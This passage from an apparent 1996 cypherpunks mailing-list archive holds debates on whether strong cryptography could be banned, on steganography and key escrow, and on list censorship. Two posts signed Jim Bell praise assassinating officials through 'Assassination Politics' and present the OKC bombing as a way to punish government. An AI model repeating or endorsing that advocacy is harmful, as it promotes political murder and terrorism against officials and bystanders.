a warrant and you search the suspect's house and computer very carefully.
If stego is in use, the software that generated it can be found.  Then
you hand out a life sentence.

Yes, this would be somewhat expensive.  But if the number of suspects
is small, it is completely feasible.

You might also identify suspects in other ways.  Maybe that Jim McCoy
is looking a little too successful or perhaps he made an unwise comment
to a "friend" who reported him.  That could easily be grounds for a
warrant and subsequent change of quarters.

> The funny thing about noise in the information theory sense is that it can
> actually be _anything_ depending on context, and this sort of uncertainty
> is the bane of a legal system which is solidly grounded upon technicalities
> (such as the US legal system.)

Which technicalities protected the Japanese-Americans during World War II?
As you probably know, these people were not protected by our legal system.
Their bank accounts were frozen and they were forced to sell their property
in less than two weeks.  They were effectively stripped of their assets.
Then, they were carted off to concentration camps and left there for years.
This was allowed to happen because there was strong public support for it.

The legal system would have to be stretched considerably less to outlaw
strong crypto and make it stick.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 16:53:33 -0800 (PST)
To: Ted Cabeen <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b01aea833c5456d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:18 PM 11/7/1996, Ted Cabeen wrote:
>At 02:38 PM 11/7/96 -0800, you wrote:
>>>Jeremiah A Blatz wrote:
>>>ph@netcom.com (Peter Hendrickson) writes:
>>> Well, once I've got my strong crypto and electronic commerce, and 20
>>> or so virtual identities to do things for me, and the gub'ment can't
>>> tell what money I'm making and spending, so they can't tax me. So if
>>> they can't tax me, and they can't tax lots of folks, then they can't
>>> pay their jack-booted thugs. So the goverment becomes irrelevant. It
>>> can't support a huge police state infrastructure, and certainly can't
>>> but mega-crays to break my crypto, so how're they going to retain
>>> control?
>>> When we say anarchy, we mean anarchy.

>> This only works if there are large numbers of people who think it is
>> a good idea.  Otherwise, the resources of the Federal Government
>> may be directed quite effectively against a small number of people.

>> If you can get a life prison term for your strong crypto you may
>> hesitate to use it.  If not, then you may get to be an example
>> for everybody else.

> That's why we have to develop stealth PGP and good stego so that the
> government doesn't even know that you're using the strong crypto that has
> been outlawed.  If they can't prove that there's actually a message in the
> picture of the catsgills you just downloaded off of
> alt.binaries.pictures.nature, you can't get a life sentence in jail.

What happens when they find it on your disk?  Remember, you don't have
an encrypted virtual disk, or if you do, the consequences are the same
if you didn't.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Thu, 7 Nov 1996 14:07:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b07aea7f1963f8c@[192.0.2.1]>
Message-ID: <0mUZne200YUg0ew2w0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ph@netcom.com (Peter Hendrickson) writes:
> It appears to be widely believed that cryptoanarchy is irreversible.
> Everybody believes that the race to deploy or forbid strong cryptography
> will define the outcome for a long time.
> 
> I can't think of a reason why this should be so.
<snip>

Well, once I've got my strong crypto and electronic commerce, and 20
or so virtual identities to do things for me, and the gub'ment can't
tell what money I'm making and spending, so they can't tax me. So if
they can't tax me, and they can't tax lots of folks, then they can't
pay their jack-booted thugs. So the goverment becomes irrelevant. It
can't support a huge police state infrastructure, and certainly can't
but mega-crays to break my crypto, so how're they going to retain
control?
When we say anarchy, we mean anarchy.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMoJc4skz/YzIV3P5AQFq2gL9FkTPQinYBJQrvOwkR/C8Hg1QQLbi7H0T
5kqgrQQkMkrMzR18hon3sQ3YR4KotInv7VVptG1Hw22k+2R+aYm3dW9tj5587KO0
sNj/A0YBXvO2sih64jr3OLJaFePC/o6K
=U9YH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C Taylor (CSD)" <mctaylor@olympus.mta.ca>
Date: Thu, 7 Nov 1996 13:07:17 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Is there a Win PGP?
In-Reply-To: <199611071228.GAA22584@mailhub.amaranth.com>
Message-ID: <Pine.OSF.3.90.961107161755.5877A-100000@olympus.mta.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, William H. Geiger III wrote:
> In <1.5.4.32.19961107072438.00dad0cc@popd.ix.netcom.com>, on 11/06/96 at 11:24 PM,
>    stewarts@ix.netcom.com said:
> 
> >For commercial applications,
> >you probably also need ViaCrypt anyway.  It was a nice product before they added Key
> >Escrow support.  Now that Phil has bought them, they'll presumably return to
> >political correctness on that issue.
> 
> Hmmm I don't think they actually had a Key Escrow Support. My understanding was that
> the user could create a master key that could be used to decrypt messages from the
> 
> Does anyone know if you can purchace a commercial license from ViaCrypt/PGP Inc. but
> use the standard PGP for commercial purposes?
>
> William H. Geiger III  http://www.amaranth.com/~whgiii

PGP Inc. (http://www.pgp.com/) is now marketing Viacrypt PGP.
 There are two packages, Viacrypt PGP Personal Edition which is PGP, like we 
all know and love. PE also is available as DOS, MS-Windows, Mac, and UNIX. So 
Viacrypt PGP/PE for DOS should feel similar if not identical to MIT's PGP, 
though I haven't tested it yet.
 You could license IDEA single-license and license RSAREF for commerical 
usage (http://www.consensus.com/ or JonathanZ@consensus.com), but why 
bother?
 They also have a Business Edition which supports key escrowing, not some 
US government backdoor, but a 'master key' for businesses to recover 
encrypted information if an employee forgets a passphase (which they do), 
dies (which they do, if the information is very important), is on 
vacation (sometimes it happens), etc.
 In a commerical environment, key escrowing is for data recovery, not for 
spying on employees. If you want to use your employer's email system for 
your personal email, then use a personal public key. 

 -Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Thu, 7 Nov 1996 17:08:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [PRIVACY][BLACKNET] Potential Analyst?
In-Reply-To: <m2afstj3f6.fsf@totally-fudged-out-message-id>
Message-ID: <m2ybgd9yuw.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Brian" == Brian D Williams <talon57@well.com> writes:

Brian> The Pro's say that analysts are born not made. If so whoever wrote
Brian> this appears to show potential.....

Brian> Send resume to BLACKNET.....

It would have been more impressive if it had mentioned that Dimitri
"Ray is a typical Californian" Vulis and Ray "You'd be surprised if
you knew where I lived" Arachelian appear to live within walking
distance of each other.
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be billed at $250/message.
What are the last two letters of "doesn't" and "can't"?
Coincidence?  I think not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Nov 1996 17:16:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611080116.RAA17853@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 PM 11/7/96 -0800, Peter Hendrickson wrote:
>It appears to be widely believed that cryptoanarchy is irreversible.
>Everybody believes that the race to deploy or forbid strong cryptography
>will define the outcome for a long time.
>
>I can't think of a reason why this should be so.

>If the wide use of strong cryptography results in widely unpopular
>activities such as sarin attacks and political assassinations, it
>would not be all that hard to forbid it, even after deployment.

Simple analogy:  Suppose you put two people into a room with a deck of 
playing cards and a table, instructing "Person A" to build a house-of-cards, 
and telling "Person B" to stop him from achieving his goal.  Who do you 
think will win?  Obviously, the latter will win:  It's vastly easier to 
knock such a structure down than to build it in the first place,  and all 
"Person B" has to do is occasionally take a whack at the structure. 

BTW, some of your confusion is probably based is the false assumptions in 
your last sentence above.  "..wide use of strong cryptography results in 
widely unpopular activities such as sarin attacks and political 
assassinations."

First, I contend that the unpopularity of political assassinations is based 
far less on their presumed undesirability, and much more so on the fact that 
the average citizen (currently) has no input on who is being killed.  He 
might well suppose that the killings are trying to deny him the little power 
and influence he has in the political system. ("They shot [fill in the 
blank}!  I voted for him!")  But what if assassination was made far more 
accessible to the common man?  Suppose, say, the approval of one million 
citizens was the only thing necessary to have an assassination legally 
accomplished?   Or, more likely in practice, the vote of a million citizens 
was interpreted as a kind of terminal veto over that particular politician 
or government employee, who would have to resign or face the (lethal) 
consquences!  In that case, assassinations wouldn't be seen as bad, they'd 
be the natural consequence of a politician who overstays his welcome and 
ignores numerous warnings.

Second, things like "sarin attacks" are, in fact, the classic example of 
actions which WOULD NOT HAPPEN under a crypto-anarchy.  Over the last 30 
years or so, "terrorism" has come to be associated with random attacks on 
innocent citizens.  But I propose that such attacks only occur because the 
better, more appropriate targets are purposely made hard to attack.  Most 
people don't realize this.  But consider:  Wouldn't the people who bombed 
the OKC Federal building have preferred to kill, for example, the top 50 
government officials responsible for Waco and Ruby Ridge, rather than 150 
ordinary government employees?  Of course they would!  

If crypto-anarchy means anything to the future of terrorism, it's about 
helping to ensure that the people truly guilty of oppression get targeted in 
preference to anybody else.  Naturally, such a point of view will be wildly 
unpopular...with the guilty few.  The rest of us should like it just fine.

This is why crypto-anarchy will be so popular with the public once it's in 
place.  No more taxes, governments, militaries, wars, holocausts, etc.  
_THAT'S_ yet one more reason why it's irreversible:  people will have seen the 
results of both systems, and they'll be damned if they're going to allow 
crooked politicians back in the game!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Thu, 7 Nov 1996 14:12:38 -0800 (PST)
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: FW: Dr. Vulis (ad nauseum)
Message-ID: <2.2.32.19961107221247.0069347c@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:27 PM 11/6/96 -0600, you wrote:
:
[snip]

:In short they have now opened themselves up for defamation and liable
suites by imposing an editorial policy on the contents of this list (1).

This is not a they; this is an individual with (and within) his own rights.

Nonsense, no policy has been stated. The owner determined that the good Dr.
had been disruptive and had become a detriment to the owner's list (and
possibly sanity).
:
:This opens up the potential, for example, for Tim May to sue the operator of
:the Cypherpunks mailing list now for posts from users (even anonymous ones)
:which defame or otherwise liable his character, reputation, or ability to
:pursue income in his chosen field.

PLEASE, let's not drag poor Tim into this. Hasn't he suffered enough?!
This does not follow even from the tortured logic above.

:In short the operators of the list
:becomes publishers and distributors of the material. It is the legal
:difference between a bookstore and a book publisher.
 
:Censorship is censorship, irrespective of the source of the limitation.
:Free expression is impossible in an environment of censorship. The right to
:speak not only implies a right to not speak, it also implies the right to
:emit complete mumbo jumbo. The actual content of the speech is irrelevant.

"Implies the right"??  Rights either exist or do not exist (endowed by their
Creator); they are not be implied.

The content of speech is certainly not irrelevant. Disruptive speech and
behavior have never been protected.
:
:The Constitution guarantees freedom of speech and press. [snip] Only that
they :would not have limitations on their actions imposed by the federal
government.
:
:				ARTICLE I. 
: 
:	Congress shall make no law [snip]

It says CONGRESS! We're not discussing an action by the federal govt. here.
I may choose to ask those visiting my house to refrain from discussing mumbo
jumbo; if the individuals persist, I can ask, nay demand, that they leave.  
:
:And just to make shure it is clear, the right to put something on the paper
:(ie speech) is distinctly different from being the one doing the actual
:printing.

What paper? What does this mean? 
:
:I have argued in the past that this list is a defacto public list because of
:the way it is advertised and to the extent it is advertised. All the protests
:by the operator to the contrary will not convince a court.

Advertised? It has been a matter of regret that I _stumbled_ into this
unruly tangle of wits.

Simply because one has argued that "the list is ... a defacto public list,"
don't make it so any more than my arguing that a newspaper available to the
public can have no control over its own editorial policy.

Let's get beyond this.

 
Cordially,

Alec                   

PGP Fingerprint:

pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Thu, 7 Nov 1996 17:14:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b10aea81624d693@[192.0.2.1]>
Message-ID: <v03007808aea835cf8016@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:
>Daniel T. Hagan wrote:
[...]
>>> If strong cryptography were unpopular and highly illegal, very few
>>> people would be using it.  This makes it easy to identify suspects.
>>
>> Or suppose that some one uses strong cryptography and then wraps it in
>> weak cryptography.  The outer shell would seem legal, and the authorities
>> can't go around randomly breaking people's keys (or so one would assume),
>> and even if they did, it wouldn't necessarily be legal as evidence anyway.
>
>In the extreme case, everybody would be sending messages in the clear.
>In the case of mandatory GAK, it would be easy to open a bunch of
>messages and see if what was inside looked like cryptography.  The
>privacy violation could be minimized by requiring a Congressionally
>approved test program to applied without any human reading it.  If
>the test program said it was cryptography, then this could be considered
>just cause for a judge to issue a warrant to the authorities for the
>study of the actual message.

Getting a program to recognize a subliminal message channel is even
harder than teaching a human to do so, check out the book Disappearing
Cryptography or do a web search for "mimic functions" to see how easy it
is to hide messages in text which a program parses as regular English.
The other problem is that more and more of the data being tossed around
the net are images and sound files in which it is incredibly easy to
hide encrypted messages.

>The laws regarding what is considered legal evidence are easily
>changed if there is a need for it.  Probably they don't need to be
>changed all that much.  If you see a lot of PGP messages coming
>from somebody, you get a warrant and search their computer for
>illegal software.  When you find it, you lock them up forever.

And if there was a penalty for using PGP then PGP would hide the fact
that such messages were being sent; that -----BEGIN PGP MESSAGE-----
line in the program output does not need to be there you know... Check
out Stealth PGP for an example.

[...]
>In the absence of strong cryptography, remailers do not offer much
>anonymity.

Except for the fact that US law stops at the US border (modulo kidnapping
Mexican doctors or strongarming the rest of the world to obey US
dictates...)  Information, on the other hand, is very easy to transport
across national boundaries and such transmission is impossible to stop.
With remailers outside the US I can send a message to a free nation and
have it delivered to whomever I want.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 17:16:43 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b02aea834cd835d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:08 PM 11/7/1996, Timothy C. May wrote:
>At 2:38 PM -0800 11/7/96, Peter Hendrickson wrote:
>
>> If you can get a life prison term for your strong crypto you may
>> hesitate to use it.  If not, then you may get to be an example
>> for everybody else.

> Well, this is what in private e-mail to Peter I was referring to when I
> said "only a police state" could pull the plug on free speech and strong
> crypto once it was ubiquitously deployed.

While the term "police state" is not well defined, I do not believe it
applies to what I am describing.  (There is a risk that it could develop,
however.)

Laws forbidding the use of cryptography have ominous free speech
implications as we would be attempting to outlaw concealed meaning.
Concealed meaning can be pretty well concealed and that makes
for difficult and dangerous legal questions.

On the other hand, the action of running a program which uses forbidden
crypto systems is pretty unambiguous and could be effectively isolated
from other kinds of speech.

Many kinds of speech are already illegal.  For instance, I am not allowed
to copy somebody else's speech because it would violate copyright laws.
I am not allowed to break verbal contracts.  In essence, I am punished
later for the something I said if I am forced to keep my word.  But,
this does not constitute a police state.

What I am proposing would not require an end to fair trials or warrants
or really any other legal customs we have.

In case anybody has any doubts, and I doubt Tim does, the existence of
a life sentence does not imply the presence of a police state.

> Throwing people in prison for life for using crypto is something that is
> certainly _possible_, though I rather doubt taxpayers will be keen on
> paying for this. Simply executing those who use random numbers makes more
> sense.

The taxpayers will be happy to pay to keep a small number of criminals
in jail if it keeps the rest of us fairly safe within our homes and on
the streets.

> All implausible, of course.

> By the way, I've never claimed that I know crypto anarchy is irreversible,
> I just think it is. I've presented some plausibility arguments on why I
> think this is so, drawing parallels to other developments in history, but
> logical proofs and predictions about the future don't usually go together
> very well.

Actually, I agree with Tim.  I think the deployment of strong cryptography
will be irreversible.  But, it will be irreversible because the bad aspects
of it won't be all that bad and in general it will be a very positive
development.  The reason it must be stopped now is to stop the voters
from discovering this.  (Certainly we have seen a strong anti-democratic
sentiment among the proponents of GAK, when they propose that we cannot
even be allowed to hear the scenarios which should concern us, the
ultimate repository of political legitimacy in the United States.)

A good comparison can be made to the recreational drug situation.  Many
people, probably a majority of people, believe that they should be allowed
to take whatever drugs they like and many do.  Efforts have been made to
forbid it, but they are almost universally unsuccessful because of the
tremendous popular support for recreational drug use.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Thu, 7 Nov 1996 15:53:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <3.0.32.19961107171853.0095b1f0@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:38 PM 11/7/96 -0800, you wrote:
>>Jeremiah A Blatz wrote:
>>ph@netcom.com (Peter Hendrickson) writes:
>> Well, once I've got my strong crypto and electronic commerce, and 20
>> or so virtual identities to do things for me, and the gub'ment can't
>> tell what money I'm making and spending, so they can't tax me. So if
>> they can't tax me, and they can't tax lots of folks, then they can't
>> pay their jack-booted thugs. So the goverment becomes irrelevant. It
>> can't support a huge police state infrastructure, and certainly can't
>> but mega-crays to break my crypto, so how're they going to retain
>> control?
>> When we say anarchy, we mean anarchy.
>
>This only works if there are large numbers of people who think it is
>a good idea.  Otherwise, the resources of the Federal Government
>may be directed quite effectively against a small number of people.
>
>If you can get a life prison term for your strong crypto you may
>hesitate to use it.  If not, then you may get to be an example
>for everybody else.
That's why we have to develop stealth PGP and good stego so that the
government doesn't even know that you're using the strong crypto that has
been outlawed.  If they can't prove that there's actually a message in the
picture of the catsgills you just downloaded off of
alt.binaries.pictures.nature, you can't get a life sentence in jail.  
--
______________________________________________________________________________
Ted Cabeen         http://shadowland.rh.uchicago.edu         cabeen@netcom.com
Check Website or finger for PGP Public Key        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province." -F. Bacon   cococabeen@aol.com
"Human kind cannot bear very much reality."-T.S.Eliot 73126.626@compuserve.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 17:22:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v03007801aea81885c729@[207.167.93.63]>
Message-ID: <v03007809aea8374f03f2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:56 PM -0600 11/7/96, Andrew Loewenstern wrote:
>TCM writes:
>> Wide distribution of tools and channels.
>
>A very important point that I haven't seen raised in this thread is _why_
>strong crypto is going to be widespread and thus impossible to control.
>Strong crypto is going to be the foundation of the information age.  Sorry
>for

Exactly, and I reemphasized the connection with digital commerce in my last
message.

I guess we haven't mentioned this enough recently, but in the early days of
the list we certainly did. We emphasized that a desirable goal is to get
strong crypto widely distributed, ubiquitously used. In commerce, between
machines (a la John Gilmore's SWAN), in intranets, in wireless data
transfers, to satellites, etc. Get it so entwined that trying to
crypto-lobotomize the Net would kill the patient.

(The Soviets and Eastern Europeans found this to be a problem...once they'd
incorporated enough of modern technology into their ways of doing things,
it was too late to try to pull the plug. Even the Chinese found that fax
machines and the Usenet were unstoppable. Even as early as 1989, pulling
the plug on the Usenet and banning fax machines was not an option. Rolling
over demonstrators with tanks was still an option, of course, and this
quelled the overt signs of trouble for a while.)


...
>middle men).  Weak Crypto (i.e. GAK) does not offer these features because
>the
>weak point in the chain becomes a mostly disinterested low-wage employee at
>the KRC, which is likely to be operated by a foreign government!  Any
>businessman can immediately understand why this is unacceptable, especially
>with all of the economic espionage stories going around corporate america.

And the GAK advocates have never clarified how an international system will
work. Even if one accepts the dubious hypothesis that the U.S. has a
noncorrupt, benign government, what of other countries? Is Ghaddaffi the
keeper of keys in Libya? How about the military government of Burma?

No business can operate if it thinks some tinhorn military ruler--or Craig
Livingstone in the White House--has trivial access to its most secret
communications, to its financial transactions, and may sell secrets to its
competitors or to other nations.

I can imagine no scheme which could possibly solve this problem. None. The
problem of "rogue governments" (and maybe all governments are rogue to at
least some other governments) means no simple solution. And the
Administration has done nothing to clarify how this will all work.

We can use this confusion to further undermine the U.S. position on GAK.
Lobbing grenades, sowing mistrust, and even "monkeywrenching" the system.


--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 17:36:58 -0800 (PST)
To: Andrew Loewenstern <tcmay@got.net>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b03aea83ae6f254@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:56 PM 11/7/1996, Andrew Loewenstern wrote:
> ...<several excellent points>...

> People will outright demand strong crypto.

> This is already happening.  Despite intense pressure from TLA's for GAK,
> savvy businesses are demanding strong crypto (the idea that no crypto at all
> will be used is utterly ridiculous, it will either be strong or GAKed but
> there will be crypto).  Hardly anyone is bowing to the pressure.  It will
>take
> a mandate from congress to get people to actually use GAK, and the more
> businesses and congresscritters begin understand the benefits of strong
>crypto
> to the bottom line, the less likely such a mandate would happen.

This implies that there is a dramatic political opportunity for those
who have not yet taken a strong stand on the issue, young congresspeople
please note.

Federal interference has probably delayed the onset of large scale net
commerce by at least a year.  The Zimmermann case alone, I suspect, has had
a dramatic chilling effect on the development of good security technologies.

It is interesting to speculate on the career consequences for those who
are currently on the wrong side of the fence.  People like Jim Exon
will, at most, find their way into an embarrassing footnote in the
history books.

What about Albert Gore?  Since the '92 election his political stock
has fallen dramatically amongst people I know.  Before his "Information
Highway" activities, a few people were suspicious of his wife's
inclinations towards censorship, but he was not generally hated.  A lot
can happen in four years.  My guess is that the general public and
even the reporters ;-) will have caught on to the issues surrounding
strong crypto by the next election which will not be good for Gore's
naked ambition.

It's also interesting to wonder what will happen to certain institutions
which have not been very well behaved.  Certainly the ATF is not well
loved.  That is not lucky for long range funding.

I suspect the NSA will be able to salvage their reputation by sticking
the blame on the Clinton administration and anybody else who is handy.
They seem to be playing both sides of the fence right now.  There is
a tremendous institutional opportunity for the NSA as the demand for
secure systems is growing exponentially and they probably know it.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel T. Hagan" <dhagan@vt.edu>
Date: Thu, 7 Nov 1996 14:38:35 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b0baea80ee121af@[192.0.2.1]>
Message-ID: <Pine.OSF.3.95.961107172525.5846A-100000@boxer.cslab.vt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, Peter Hendrickson wrote:

> > If I understand the reasoning, people beleive it is easier to prevent the
> > release of strong crypto. techiniques than to remove them once they are
> > released.
> 
> The reasons underlying this are what I don't completely understand.
> 
> > Once a terrorist has strong crypto, why should they stop using it if it
> > becomes illegal?
> 
> Use of strong crypto would be a tip off that one is a terrorist.
> 
> If strong cryptography were unpopular and highly illegal, very few
> people would be using it.  This makes it easy to identify suspects.
> 
> Peter Hendrickson
> ph@netcom.com
> 


I think the reasons are probably tied closely to your second point.
Unless strong cryptography was easily distinguishable from weak
cryptography without taking the time to break it, then how would they
(law enforcement) recognize that someone was using strong cryptography?

Or suppose that some one uses strong cryptography and then wraps it in 
weak cryptography.  The outer shell would seem legal, and the authorities
can't go around randomly breaking people's keys (or so one would assume),
and even if they did, it wouldn't necessarily be legal as evidence anyway.

And finally, you have to consider the possibility of whether a person can
be identified merely by the fact that there is a message that is
intercepted that has strong cryptography in it.  I don't know enough about
remailers and internet protocols/servers to say whether this is a
reasonable objection or not, perhaps someone else does?

So, unless I'm incorrect about one of the above points (and I admit that I
may well be), once cryptography reaches a certain strength, there is no
reason to relinquish that strength, particularly if you are using it for
criminal activity.  

Daniel

---
Daniel Hagan                 http://acm.vt.edu/~dhagan                CS Major 
dhagan@vt.edu 	       http://acm.vt.edu/~dhagan/PGPkey.html     Virginia Tech
     Key fingerprint =  DB 18 30 0A E1 69 7E 51  E2 14 E3 E3 1C AE 69 97






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Nov 1996 17:46:31 -0800 (PST)
To: Black Unicorn <attila@primenet.com
Subject: Re: RICO - (Was: Group order for Secret Power)
Message-ID: <199611080145.RAA20080@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:43 PM 11/7/96 -0500, Black Unicorn wrote:

>
>I cover RICO because it's a popular prosecution tool,

"popular"?  Well, only in a rather stilted point of view!


> because it is 
>the predominate vehicle for seizure and forfeiture in federal cases 
>(of which remailer and encryption issues are likely to arouse) and 
>because it represents a codification of the approach most courts take 
>when dealing with seizure cases.  In a very real way, RICO represents 
>the outer extremes of seizure cases in the United States, and is 
>probably, given the complexity of many state laws, the simplest way 
>to "grab" something.  It also has civil provisions which make 
>"private prosecutors" out of you and me.

But the odd thing is, the one entity we can't seem to attack using RICO is 
the Federal government, and probably most other governments levels.  Looked 
at purely objectively, it should be easy to demonstrate that the Federal 
government (and its representatives) have engaged in plenty of crime as a 
pattern of activity, and certainly enough to rise to the level of the 
standards of RICO. (It takes only a few instances of such crime satisfy the 
standards of RICO.)

Change the name "Federal Government" to "Organization X," and describe what 
it's done, and all the evidence will point to a clear pattern of crime. 

Now, okay, it may seem presumptuous of me to even dream of the possibility 
of using RICO against the thugs who wrote it.  But this country (USA) is 
SUPPOSED to be under the rule of law, not men, and there is no reason (other 
than, sadly, pessimism or a-priori realism) to conclude that the government 
can't be punished when it breaks its own rules.  Such punishment could come 
by way of mechanisms such as the OKC bombing, or the far more selective 
system Assassination Politics (AP).  Take your choice.





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Thu, 7 Nov 1996 17:46:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b00aea82fb2502a@[192.0.2.1]>
Message-ID: <v0300780aaea83a017ca3@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson writes:
>Jim McCoy wrote:
>>ph@netcom.com (Peter Hendrickson) writes:
>>[...]
>>> Use of strong crypto would be a tip off that one is a terrorist.
>
>>> If strong cryptography were unpopular and highly illegal, very few
>>> people would be using it.  This makes it easy to identify suspects.
>
>> But the difference between strong crypto and weak crypto is not
>> something which is visible to an outside observer unless they make
>> the effort to attack a particular system or decrypt a message.
[...]
>If mandatory GAK were imposed, reviewing messages is easy, even with
>inter-agency fighting.  Or, encryption in general could just be
>forbidden if GAK created too much hassle.

Encryption itself will never be forbidden because there is far too much
money riding on electronic commerce.  An administration which tried to
outlaw all encryption would soon find itself on the next train out of
D.C. after the next election cycle.  [And high-tech is definitely getting
more politically aware and organized as the recent Calif. prop 211 shows]
There are a lot of very powerful people betting on systems which require
at least a minimal amount of encryption (at least enough to make random
ciphertext transmissions common on the net.)

Reviewing messages and actually finding stego'd messages is actually a
very, very, hard problem for a program.  This is the sort of AI problem
which people have been working on for more than thirty years and no one
has even come close to solving it.  When you add in the fact that
communication on the net is becoming more international there will be even
more problems for such a program to solve (e.g. a Malay<->English
translation program will throw a ton of false poitives into the mix for
any program developed which somehow has enough understanding of English
to detect messages whose grammar and word choice indicates a possible mimic
function, if the two users communicate using mimic functions within the
translation program itself you are completely screwed...)


>> What make such detection even harder is that a good crypto system
>> generates output which is indistinguishable from noise, this makes it
>> much easier to hide the fact that an encrypted channel is being used.
>
>In practice I suspect that good stego is hard.

You are mistaken.  Read Disappearing Cryptography to see just how easy
it is, then check out Romana Machado's EzStego program (done in Java so
it can be added to any web download with a bit of tweaking.)   If the
penalty for using bad stego is high enough you can be certain that natural
selection will make certain that eventually the programs being used are
top notch code :)

>You don't have to be
>right every time when you look for it, just some of the time.  When
>you see packets that seem kind of funny to you, the judge issues you
>a warrant and you search the suspect's house and computer very carefully.
>If stego is in use, the software that generated it can be found.  Then
>you hand out a life sentence.

The problem is that you need to be able to prove that stego is in use, and
this is a much more difficult task than you suggest.  A good stego program
will turn out bits which are indistinguishable from noise, so there is no
way to actually _prove_ that stego is being used without actually breaking
the cipher used in the stego routines.  Remember, that life sentence you
suggests requires "proof beyond a reasonable doubt" in US courts, bit rot
from multiple image scannings or a bad microphone on a IP phone conversation
should be more than enough for the accused to cast doubt into the minds of
the jury members.

>You might also identify suspects in other ways.  Maybe that Jim McCoy
>is looking a little too successful or perhaps he made an unwise comment
>to a "friend" who reported him.  That could easily be grounds for a
>warrant and subsequent change of quarters.

Get a warrant, search my system, find nothing but a bunch of applications
and a collection of risque (but definitely legal) pictures which I exchange
with a few friends.  You may suspect that when the images are concatenated
